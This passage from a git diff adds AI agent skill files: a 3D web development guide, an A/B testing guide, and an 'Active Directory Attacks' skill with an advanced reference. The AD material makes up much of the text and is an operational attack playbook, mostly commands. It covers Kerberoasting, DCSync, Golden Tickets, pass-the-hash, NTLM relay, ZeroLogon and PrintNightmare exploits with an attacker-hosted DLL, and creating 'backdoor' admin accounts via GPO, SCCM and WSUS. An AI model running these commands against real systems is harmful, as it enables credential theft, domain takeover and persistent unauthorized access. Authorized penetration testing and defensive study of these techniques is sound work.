echo "Done! Your local library now has only the recommended skills."

2
scripts/validate_skills.py
View File

@@ -7,6 +7,8 @@ def validate_skills(skills_dir):
skill_count = 0
for root, dirs, files in os.walk(skills_dir):
# Skip .disabled directories
dirs[:] = [d for d in dirs if d != '.disabled']
if "SKILL.md" in files:
skill_count += 1
skill_path = os.path.join(root, "SKILL.md")

3
skills/.gitignore vendored Normal file
View File

@@ -0,0 +1,3 @@
# Local-only: disabled skills for lean configuration
# These skills are kept in the repository but disabled locally
.disabled/

254
skills/3d-web-experience/SKILL.md Normal file
View File

@@ -0,0 +1,254 @@
---
name: 3d-web-experience
description: "Expert in building 3D experiences for the web - Three.js, React Three Fiber, Spline, WebGL, and interactive 3D scenes. Covers product configurators, 3D portfolios, immersive websites, and bringing depth to web experiences. Use when: 3D website, three.js, WebGL, react three fiber, 3D experience."
source: vibeship-spawner-skills (Apache 2.0)
---
# 3D Web Experience
**Role**: 3D Web Experience Architect
You bring the third dimension to the web. You know when 3D enhances
and when it's just showing off. You balance visual impact with
performance. You make 3D accessible to users who've never touched
a 3D app. You create moments of wonder without sacrificing usability.
## Capabilities
- Three.js implementation
- React Three Fiber
- WebGL optimization
- 3D model integration
- Spline workflows
- 3D product configurators
- Interactive 3D scenes
- 3D performance optimization
## Patterns
### 3D Stack Selection
Choosing the right 3D approach
**When to use**: When starting a 3D web project
```python
## 3D Stack Selection
### Options Comparison
| Tool | Best For | Learning Curve | Control |
|------|----------|----------------|---------|
| Spline | Quick prototypes, designers | Low | Medium |
| React Three Fiber | React apps, complex scenes | Medium | High |
| Three.js vanilla | Max control, non-React | High | Maximum |
| Babylon.js | Games, heavy 3D | High | Maximum |
### Decision Tree
```
Need quick 3D element?
└── Yes → Spline
└── No → Continue
Using React?
└── Yes → React Three Fiber
└── No → Continue
Need max performance/control?
└── Yes → Three.js vanilla
└── No → Spline or R3F
```
### Spline (Fastest Start)
```jsx
import Spline from '@splinetool/react-spline';
export default function Scene() {
return (
<Spline scene="https://prod.spline.design/xxx/scene.splinecode" />
);
}
```
### React Three Fiber
```jsx
import { Canvas } from '@react-three/fiber';
import { OrbitControls, useGLTF } from '@react-three/drei';
function Model() {
const { scene } = useGLTF('/model.glb');
return <primitive object={scene} />;
}
export default function Scene() {
return (
<Canvas>
<ambientLight />
<Model />
<OrbitControls />
</Canvas>
);
}
```
```
### 3D Model Pipeline
Getting models web-ready
**When to use**: When preparing 3D assets
```python
## 3D Model Pipeline
### Format Selection
| Format | Use Case | Size |
|--------|----------|------|
| GLB/GLTF | Standard web 3D | Smallest |
| FBX | From 3D software | Large |
| OBJ | Simple meshes | Medium |
| USDZ | Apple AR | Medium |
### Optimization Pipeline
```
1. Model in Blender/etc
2. Reduce poly count (< 100K for web)
3. Bake textures (combine materials)
4. Export as GLB
5. Compress with gltf-transform
6. Test file size (< 5MB ideal)
```
### GLTF Compression
```bash
# Install gltf-transform
npm install -g @gltf-transform/cli
# Compress model
gltf-transform optimize input.glb output.glb \
--compress draco \
--texture-compress webp
```
### Loading in R3F
```jsx
import { useGLTF, useProgress, Html } from '@react-three/drei';
import { Suspense } from 'react';
function Loader() {
const { progress } = useProgress();
return <Html center>{progress.toFixed(0)}%</Html>;
}
export default function Scene() {
return (
<Canvas>
<Suspense fallback={<Loader />}>
<Model />
</Suspense>
</Canvas>
);
}
```
```
### Scroll-Driven 3D
3D that responds to scroll
**When to use**: When integrating 3D with scroll
```python
## Scroll-Driven 3D
### R3F + Scroll Controls
```jsx
import { ScrollControls, useScroll } from '@react-three/drei';
import { useFrame } from '@react-three/fiber';
function RotatingModel() {
const scroll = useScroll();
const ref = useRef();
useFrame(() => {
// Rotate based on scroll position
ref.current.rotation.y = scroll.offset * Math.PI * 2;
});
return <mesh ref={ref}>...</mesh>;
}
export default function Scene() {
return (
<Canvas>
<ScrollControls pages={3}>
<RotatingModel />
</ScrollControls>
</Canvas>
);
}
```
### GSAP + Three.js
```javascript
import gsap from 'gsap';
import ScrollTrigger from 'gsap/ScrollTrigger';
gsap.to(camera.position, {
scrollTrigger: {
trigger: '.section',
scrub: true,
},
z: 5,
y: 2,
});
```
### Common Scroll Effects
- Camera movement through scene
- Model rotation on scroll
- Reveal/hide elements
- Color/material changes
- Exploded view animations
```
## Anti-Patterns
### ❌ 3D For 3D's Sake
**Why bad**: Slows down the site.
Confuses users.
Battery drain on mobile.
Doesn't help conversion.
**Instead**: 3D should serve a purpose.
Product visualization = good.
Random floating shapes = probably not.
Ask: would an image work?
### ❌ Desktop-Only 3D
**Why bad**: Most traffic is mobile.
Kills battery.
Crashes on low-end devices.
Frustrated users.
**Instead**: Test on real mobile devices.
Reduce quality on mobile.
Provide static fallback.
Consider disabling 3D on low-end.
### ❌ No Loading State
**Why bad**: Users think it's broken.
High bounce rate.
3D takes time to load.
Bad first impression.
**Instead**: Loading progress indicator.
Skeleton/placeholder.
Load 3D after page is interactive.
Optimize model size.
## Related Skills
Works well with: `scroll-experience`, `interactive-portfolio`, `frontend`, `landing-page-design`

508
skills/ab-test-setup/SKILL.md Normal file
View File

@@ -0,0 +1,508 @@
---
name: ab-test-setup
description: When the user wants to plan, design, or implement an A/B test or experiment. Also use when the user mentions "A/B test," "split test," "experiment," "test this change," "variant copy," "multivariate test," or "hypothesis." For tracking implementation, see analytics-tracking.
---
# A/B Test Setup
You are an expert in experimentation and A/B testing. Your goal is to help design tests that produce statistically valid, actionable results.
## Initial Assessment
Before designing a test, understand:
1. **Test Context**
- What are you trying to improve?
- What change are you considering?
- What made you want to test this?
2. **Current State**
- Baseline conversion rate?
- Current traffic volume?
- Any historical test data?
3. **Constraints**
- Technical implementation complexity?
- Timeline requirements?
- Tools available?
---
## Core Principles
### 1. Start with a Hypothesis
- Not just "let's see what happens"
- Specific prediction of outcome
- Based on reasoning or data
### 2. Test One Thing
- Single variable per test
- Otherwise you don't know what worked
- Save MVT for later
### 3. Statistical Rigor
- Pre-determine sample size
- Don't peek and stop early
- Commit to the methodology
### 4. Measure What Matters
- Primary metric tied to business value
- Secondary metrics for context
- Guardrail metrics to prevent harm
---
## Hypothesis Framework
### Structure
```
Because [observation/data],
we believe [change]
will cause [expected outcome]
for [audience].
We'll know this is true when [metrics].
```
### Examples
**Weak hypothesis:**
"Changing the button color might increase clicks."
**Strong hypothesis:**
"Because users report difficulty finding the CTA (per heatmaps and feedback), we believe making the button larger and using contrasting color will increase CTA clicks by 15%+ for new visitors. We'll measure click-through rate from page view to signup start."
### Good Hypotheses Include
- **Observation**: What prompted this idea
- **Change**: Specific modification
- **Effect**: Expected outcome and direction
- **Audience**: Who this applies to
- **Metric**: How you'll measure success
---
## Test Types
### A/B Test (Split Test)
- Two versions: Control (A) vs. Variant (B)
- Single change between versions
- Most common, easiest to analyze
### A/B/n Test
- Multiple variants (A vs. B vs. C...)
- Requires more traffic
- Good for testing several options
### Multivariate Test (MVT)
- Multiple changes in combinations
- Tests interactions between changes
- Requires significantly more traffic
- Complex analysis
### Split URL Test
- Different URLs for variants
- Good for major page changes
- Easier implementation sometimes
---
## Sample Size Calculation
### Inputs Needed
1. **Baseline conversion rate**: Your current rate
2. **Minimum detectable effect (MDE)**: Smallest change worth detecting
3. **Statistical significance level**: Usually 95%
4. **Statistical power**: Usually 80%
### Quick Reference
| Baseline Rate | 10% Lift | 20% Lift | 50% Lift |
|---------------|----------|----------|----------|
| 1% | 150k/variant | 39k/variant | 6k/variant |
| 3% | 47k/variant | 12k/variant | 2k/variant |
| 5% | 27k/variant | 7k/variant | 1.2k/variant |
| 10% | 12k/variant | 3k/variant | 550/variant |
### Formula Resources
- Evan Miller's calculator: https://www.evanmiller.org/ab-testing/sample-size.html
- Optimizely's calculator: https://www.optimizely.com/sample-size-calculator/
### Test Duration
```
Duration = Sample size needed per variant × Number of variants
───────────────────────────────────────────────────
Daily traffic to test page × Conversion rate
```
Minimum: 1-2 business cycles (usually 1-2 weeks)
Maximum: Avoid running too long (novelty effects, external factors)
---
## Metrics Selection
### Primary Metric
- Single metric that matters most
- Directly tied to hypothesis
- What you'll use to call the test
### Secondary Metrics
- Support primary metric interpretation
- Explain why/how the change worked
- Help understand user behavior
### Guardrail Metrics
- Things that shouldn't get worse
- Revenue, retention, satisfaction
- Stop test if significantly negative
### Metric Examples by Test Type
**Homepage CTA test:**
- Primary: CTA click-through rate
- Secondary: Time to click, scroll depth
- Guardrail: Bounce rate, downstream conversion
**Pricing page test:**
- Primary: Plan selection rate
- Secondary: Time on page, plan distribution
- Guardrail: Support tickets, refund rate
**Signup flow test:**
- Primary: Signup completion rate
- Secondary: Field-level completion, time to complete
- Guardrail: User activation rate (post-signup quality)
---
## Designing Variants
### Control (A)
- Current experience, unchanged
- Don't modify during test
### Variant (B+)
**Best practices:**
- Single, meaningful change
- Bold enough to make a difference
- True to the hypothesis
**What to vary:**
Headlines/Copy:
- Message angle
- Value proposition
- Specificity level
- Tone/voice
Visual Design:
- Layout structure
- Color and contrast
- Image selection
- Visual hierarchy
CTA:
- Button copy
- Size/prominence
- Placement
- Number of CTAs
Content:
- Information included
- Order of information
- Amount of content
- Social proof type
### Documenting Variants
```
Control (A):
- Screenshot
- Description of current state
Variant (B):
- Screenshot or mockup
- Specific changes made
- Hypothesis for why this will win
```
---
## Traffic Allocation
### Standard Split
- 50/50 for A/B test
- Equal split for multiple variants
### Conservative Rollout
- 90/10 or 80/20 initially
- Limits risk of bad variant
- Longer to reach significance
### Ramping
- Start small, increase over time
- Good for technical risk mitigation
- Most tools support this
### Considerations
- Consistency: Users see same variant on return
- Segment sizes: Ensure segments are large enough
- Time of day/week: Balanced exposure
---
## Implementation Approaches
### Client-Side Testing
**Tools**: PostHog, Optimizely, VWO, custom
**How it works**:
- JavaScript modifies page after load
- Quick to implement
- Can cause flicker
**Best for**:
- Marketing pages
- Copy/visual changes
- Quick iteration
### Server-Side Testing
**Tools**: PostHog, LaunchDarkly, Split, custom
**How it works**:
- Variant determined before page renders
- No flicker
- Requires development work
**Best for**:
- Product features
- Complex changes
- Performance-sensitive pages
### Feature Flags
- Binary on/off (not true A/B)
- Good for rollouts
- Can convert to A/B with percentage split
---
## Running the Test
### Pre-Launch Checklist
- [ ] Hypothesis documented
- [ ] Primary metric defined
- [ ] Sample size calculated
- [ ] Test duration estimated
- [ ] Variants implemented correctly
- [ ] Tracking verified
- [ ] QA completed on all variants
- [ ] Stakeholders informed
### During the Test
**DO:**
- Monitor for technical issues
- Check segment quality
- Document any external factors
**DON'T:**
- Peek at results and stop early
- Make changes to variants
- Add traffic from new sources
- End early because you "know" the answer
### Peeking Problem
Looking at results before reaching sample size and stopping when you see significance leads to:
- False positives
- Inflated effect sizes
- Wrong decisions
**Solutions:**
- Pre-commit to sample size and stick to it
- Use sequential testing if you must peek
- Trust the process
---
## Analyzing Results
### Statistical Significance
- 95% confidence = p-value < 0.05
- Means: <5% chance result is random
- Not a guarantee—just a threshold
### Practical Significance
Statistical ≠ Practical
- Is the effect size meaningful for business?
- Is it worth the implementation cost?
- Is it sustainable over time?
### What to Look At
1. **Did you reach sample size?**
- If not, result is preliminary
2. **Is it statistically significant?**
- Check confidence intervals
- Check p-value
3. **Is the effect size meaningful?**
- Compare to your MDE
- Project business impact
4. **Are secondary metrics consistent?**
- Do they support the primary?
- Any unexpected effects?
5. **Any guardrail concerns?**
- Did anything get worse?
- Long-term risks?
6. **Segment differences?**
- Mobile vs. desktop?
- New vs. returning?
- Traffic source?
### Interpreting Results
| Result | Conclusion |
|--------|------------|
| Significant winner | Implement variant |
| Significant loser | Keep control, learn why |
| No significant difference | Need more traffic or bolder test |
| Mixed signals | Dig deeper, maybe segment |
---
## Documenting and Learning
### Test Documentation
```
Test Name: [Name]
Test ID: [ID in testing tool]
Dates: [Start] - [End]
Owner: [Name]
Hypothesis:
[Full hypothesis statement]
Variants:
- Control: [Description + screenshot]
- Variant: [Description + screenshot]
Results:
- Sample size: [achieved vs. target]
- Primary metric: [control] vs. [variant] ([% change], [confidence])
- Secondary metrics: [summary]
- Segment insights: [notable differences]
Decision: [Winner/Loser/Inconclusive]
Action: [What we're doing]
Learnings:
[What we learned, what to test next]
```
### Building a Learning Repository
- Central location for all tests
- Searchable by page, element, outcome
- Prevents re-running failed tests
- Builds institutional knowledge
---
## Output Format
### Test Plan Document
```
# A/B Test: [Name]
## Hypothesis
[Full hypothesis using framework]
## Test Design
- Type: A/B / A/B/n / MVT
- Duration: X weeks
- Sample size: X per variant
- Traffic allocation: 50/50
## Variants
[Control and variant descriptions with visuals]
## Metrics
- Primary: [metric and definition]
- Secondary: [list]
- Guardrails: [list]
## Implementation
- Method: Client-side / Server-side
- Tool: [Tool name]
- Dev requirements: [If any]
## Analysis Plan
- Success criteria: [What constitutes a win]
- Segment analysis: [Planned segments]
```
### Results Summary
When test is complete
### Recommendations
Next steps based on results
---
## Common Mistakes
### Test Design
- Testing too small a change (undetectable)
- Testing too many things (can't isolate)
- No clear hypothesis
- Wrong audience
### Execution
- Stopping early
- Changing things mid-test
- Not checking implementation
- Uneven traffic allocation
### Analysis
- Ignoring confidence intervals
- Cherry-picking segments
- Over-interpreting inconclusive results
- Not considering practical significance
---
## Questions to Ask
If you need more context:
1. What's your current conversion rate?
2. How much traffic does this page get?
3. What change are you considering and why?
4. What's the smallest improvement worth detecting?
5. What tools do you have for testing?
6. Have you tested this area before?
---
## Related Skills
- **page-cro**: For generating test ideas based on CRO principles
- **analytics-tracking**: For setting up test measurement
- **copywriting**: For creating variant copy

380
skills/active-directory-attacks/SKILL.md Normal file
View File

@@ -0,0 +1,380 @@
---
name: Active Directory Attacks
description: This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
---
# Active Directory Attacks
## Purpose
Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.
## Inputs/Prerequisites
- Kali Linux or Windows attack platform
- Domain user credentials (for most attacks)
- Network access to Domain Controller
- Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec
## Outputs/Deliverables
- Domain enumeration data
- Extracted credentials and hashes
- Kerberos tickets for impersonation
- Domain Administrator access
- Persistent access mechanisms
---
## Essential Tools
| Tool | Purpose |
|------|---------|
| BloodHound | AD attack path visualization |
| Impacket | Python AD attack tools |
| Mimikatz | Credential extraction |
| Rubeus | Kerberos attacks |
| CrackMapExec | Network exploitation |
| PowerView | AD enumeration |
| Responder | LLMNR/NBT-NS poisoning |
---
## Core Workflow
### Step 1: Kerberos Clock Sync
Kerberos requires clock synchronization (±5 minutes):
```bash
# Detect clock skew
nmap -sT 10.10.10.10 -p445 --script smb2-time
# Fix clock on Linux
sudo date -s "14 APR 2024 18:25:16"
# Fix clock on Windows
net time /domain /set
# Fake clock without changing system time
faketime -f '+8h' <command>
```
### Step 2: AD Reconnaissance with BloodHound
```bash
# Start BloodHound
neo4j console
bloodhound --no-sandbox
# Collect data with SharpHound
.\SharpHound.exe -c All
.\SharpHound.exe -c All --ldapusername user --ldappassword pass
# Python collector (from Linux)
bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all
```
### Step 3: PowerView Enumeration
```powershell
# Get domain info
Get-NetDomain
Get-DomainSID
Get-NetDomainController
# Enumerate users
Get-NetUser
Get-NetUser -SamAccountName targetuser
Get-UserProperty -Properties pwdlastset
# Enumerate groups
Get-NetGroupMember -GroupName "Domain Admins"
Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member
# Find local admin access
Find-LocalAdminAccess -Verbose
# User hunting
Invoke-UserHunter
Invoke-UserHunter -Stealth
```
---
## Credential Attacks
### Password Spraying
```bash
# Using kerbrute
./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123
# Using CrackMapExec
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success
```
### Kerberoasting
Extract service account TGS tickets and crack offline:
```bash
# Impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt
# CrackMapExec
crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt
# Crack with hashcat
hashcat -m 13100 hashes.txt rockyou.txt
```
### AS-REP Roasting
Target accounts with "Do not require Kerberos preauthentication":
```bash
# Impacket
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
# Rubeus
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
# Crack with hashcat
hashcat -m 18200 hashes.txt rockyou.txt
```
### DCSync Attack
Extract credentials directly from DC (requires Replicating Directory Changes rights):
```bash
# Impacket
secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt
# Mimikatz
lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /domain:domain.local /user:Administrator
```
---
## Kerberos Ticket Attacks
### Pass-the-Ticket (Golden Ticket)
Forge TGT with krbtgt hash for any user:
```powershell
# Get krbtgt hash via DCSync first
# Mimikatz - Create Golden Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt
# Impacket
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass domain.local/Administrator@dc.domain.local
```
### Silver Ticket
Forge TGS for specific service:
```powershell
# Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt
```
### Pass-the-Hash
```bash
# Impacket
psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
# CrackMapExec
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth
```
### OverPass-the-Hash
Convert NTLM hash to Kerberos ticket:
```bash
# Impacket
getTGT.py domain.local/user -hashes :NTHASH
export KRB5CCNAME=user.ccache
# Rubeus
.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt
```
---
## NTLM Relay Attacks
### Responder + ntlmrelayx
```bash
# Start Responder (disable SMB/HTTP for relay)
responder -I eth0 -wrf
# Start relay
ntlmrelayx.py -tf targets.txt -smb2support
# LDAP relay for delegation attack
ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access
```
### SMB Signing Check
```bash
crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt
```
---
## Certificate Services Attacks (AD CS)
### ESC1 - Misconfigured Templates
```bash
# Find vulnerable templates
certipy find -u user@domain.local -p password -dc-ip 10.10.10.10
# Exploit ESC1
certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local
# Authenticate with certificate
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
```
### ESC8 - Web Enrollment Relay
```bash
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
```
---
## Critical CVEs
### ZeroLogon (CVE-2020-1472)
```bash
# Check vulnerability
crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon
# Exploit
python3 cve-2020-1472-exploit.py DC01 10.10.10.10
# Extract hashes
secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass
# Restore password (important!)
python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD
```
### PrintNightmare (CVE-2021-1675)
```bash
# Check for vulnerability
rpcdump.py @10.10.10.10 | grep 'MS-RPRN'
# Exploit (requires hosting malicious DLL)
python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'
```
### samAccountName Spoofing (CVE-2021-42278/42287)
```bash
# Automated exploitation
python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell
```
---
## Quick Reference
| Attack | Tool | Command |
|--------|------|---------|
| Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` |
| AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` |
| DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` |
| Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` |
| Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` |
| Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` |
---
## Constraints
**Must:**
- Synchronize time with DC before Kerberos attacks
- Have valid domain credentials for most attacks
- Document all compromised accounts
**Must Not:**
- Lock out accounts with excessive password spraying
- Modify production AD objects without approval
- Leave Golden Tickets without documentation
**Should:**
- Run BloodHound for attack path discovery
- Check for SMB signing before relay attacks
- Verify patch levels for CVE exploitation
---
## Examples
### Example 1: Domain Compromise via Kerberoasting
```bash
# 1. Find service accounts with SPNs
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10
# 2. Request TGS tickets
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt
# 3. Crack tickets
hashcat -m 13100 tgs.txt rockyou.txt
# 4. Use cracked service account
psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10
```
### Example 2: NTLM Relay to LDAP
```bash
# 1. Start relay targeting LDAP
ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access
# 2. Trigger authentication (e.g., via PrinterBug)
python3 printerbug.py domain.local/user:pass@target 10.10.10.12
# 3. Use created machine account for RBCD attack
```
---
## Troubleshooting
| Issue | Solution |
|-------|----------|
| Clock skew too great | Sync time with DC or use faketime |
| Kerberoasting returns empty | No service accounts with SPNs |
| DCSync access denied | Need Replicating Directory Changes rights |
| NTLM relay fails | Check SMB signing, try LDAP target |
| BloodHound empty | Verify collector ran with correct creds |
---
## Additional Resources
For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md).

382
skills/active-directory-attacks/references/advanced-attacks.md Normal file
View File

@@ -0,0 +1,382 @@
# Advanced Active Directory Attacks Reference
## Table of Contents
1. [Delegation Attacks](#delegation-attacks)
2. [Group Policy Object Abuse](#group-policy-object-abuse)
3. [RODC Attacks](#rodc-attacks)
4. [SCCM/WSUS Deployment](#sccmwsus-deployment)
5. [AD Certificate Services (ADCS)](#ad-certificate-services-adcs)
6. [Trust Relationship Attacks](#trust-relationship-attacks)
7. [ADFS Golden SAML](#adfs-golden-saml)
8. [Credential Sources](#credential-sources)
9. [Linux AD Integration](#linux-ad-integration)
---
## Delegation Attacks
### Unconstrained Delegation
When a user authenticates to a computer with unconstrained delegation, their TGT is saved to memory.
**Find Delegation:**
```powershell
# PowerShell
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
# BloodHound
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
```
**SpoolService Abuse:**
```bash
# Check spooler service
ls \\dc01\pipe\spoolss
# Trigger with SpoolSample
.\SpoolSample.exe DC01.domain.local HELPDESK.domain.local
# Or with printerbug.py
python3 printerbug.py 'domain/user:pass'@DC01 ATTACKER_IP
```
**Monitor with Rubeus:**
```powershell
Rubeus.exe monitor /interval:1
```
### Constrained Delegation
**Identify:**
```powershell
Get-DomainComputer -TrustedToAuth | select -exp msds-AllowedToDelegateTo
```
**Exploit with Rubeus:**
```powershell
# S4U2 attack
Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
```
**Exploit with Impacket:**
```bash
getST.py -spn HOST/target.domain.local 'domain/user:password' -impersonate Administrator -dc-ip DC_IP
```
### Resource-Based Constrained Delegation (RBCD)
```powershell
# Create machine account
New-MachineAccount -MachineAccount AttackerPC -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
# Set delegation
Set-ADComputer target -PrincipalsAllowedToDelegateToAccount AttackerPC$
# Get ticket
.\Rubeus.exe s4u /user:AttackerPC$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
```
---
## Group Policy Object Abuse
### Find Vulnerable GPOs
```powershell
Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|WriteDacl|WriteOwner")}
```
### Abuse with SharpGPOAbuse
```powershell
# Add local admin
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO"
# Add user rights
.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "Vulnerable GPO"
# Add immediate task
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add" --GPOName "Vulnerable GPO"
```
### Abuse with pyGPOAbuse (Linux)
```bash
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
```
---
## RODC Attacks
### RODC Golden Ticket
RODCs contain filtered AD copy (excludes LAPS/Bitlocker keys). Forge tickets for principals in msDS-RevealOnDemandGroup.
### RODC Key List Attack
**Requirements:**
- krbtgt credentials of the RODC (-rodcKey)
- ID of the krbtgt account of the RODC (-rodcNo)
```bash
# Impacket keylistattack
keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full
# Using secretsdump with keylist
secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
```
**Using Rubeus:**
```powershell
Rubeus.exe golden /rodcNumber:25078 /aes256:RODC_AES256_KEY /user:Administrator /id:500 /domain:domain.local /sid:S-1-5-21-xxx
```
---
## SCCM/WSUS Deployment
### SCCM Attack with MalSCCM
```bash
# Locate SCCM server
MalSCCM.exe locate
# Enumerate targets
MalSCCM.exe inspect /all
MalSCCM.exe inspect /computers
# Create target group
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET-PC
# Create malicious app
MalSCCM.exe app /create /name:backdoor /uncpath:"\\SCCM\SCCMContentLib$\evil.exe"
# Deploy
MalSCCM.exe app /deploy /name:backdoor /groupname:TargetGroup /assignmentname:update
# Force checkin
MalSCCM.exe checkin /groupname:TargetGroup
# Cleanup
MalSCCM.exe app /cleanup /name:backdoor
MalSCCM.exe group /delete /groupname:TargetGroup
```
### SCCM Network Access Accounts
```powershell
# Find SCCM blob
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
# Decrypt with SharpSCCM
.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
```
### WSUS Deployment Attack
```bash
# Using SharpWSUS
SharpWSUS.exe locate
SharpWSUS.exe inspect
# Create malicious update
SharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user backdoor Password123! /add\"" /title:"Critical Update"
# Deploy to target
SharpWSUS.exe approve /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
# Check status
SharpWSUS.exe check /updateid:GUID /computername:TARGET.domain.local
# Cleanup
SharpWSUS.exe delete /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
```
---
## AD Certificate Services (ADCS)
### ESC1 - Misconfigured Templates
Template allows ENROLLEE_SUPPLIES_SUBJECT with Client Authentication EKU.
```bash
# Find vulnerable templates
certipy find -u user@domain.local -p password -dc-ip DC_IP -vulnerable
# Request certificate as admin
certipy req -u user@domain.local -p password -ca CA-NAME -target ca.domain.local -template VulnTemplate -upn administrator@domain.local
# Authenticate
certipy auth -pfx administrator.pfx -dc-ip DC_IP
```
### ESC4 - ACL Vulnerabilities
```python
# Check for WriteProperty
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -get-acl
# Add ENROLLEE_SUPPLIES_SUBJECT flag
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
# Perform ESC1, then restore
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -value 0 -property mspki-Certificate-Name-Flag
```
### ESC8 - NTLM Relay to Web Enrollment
```bash
# Start relay
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# Coerce authentication
python3 petitpotam.py ATTACKER_IP DC_IP
# Use certificate
Rubeus.exe asktgt /user:DC$ /certificate:BASE64_CERT /ptt
```
### Shadow Credentials
```bash
# Add Key Credential (pyWhisker)
python3 pywhisker.py -d "domain.local" -u "user1" -p "password" --target "TARGET" --action add
# Get TGT with PKINIT
python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "password" "domain.local/TARGET" target.ccache
# Get NT hash
export KRB5CCNAME=target.ccache
python3 getnthash.py -key 'AS-REP_KEY' domain.local/TARGET
```
---
## Trust Relationship Attacks
### Child to Parent Domain (SID History)
```powershell
# Get Enterprise Admins SID from parent
$ParentSID = "S-1-5-21-PARENT-DOMAIN-SID-519"
# Create Golden Ticket with SID History
kerberos::golden /user:Administrator /domain:child.parent.local /sid:S-1-5-21-CHILD-SID /krbtgt:KRBTGT_HASH /sids:$ParentSID /ptt
```
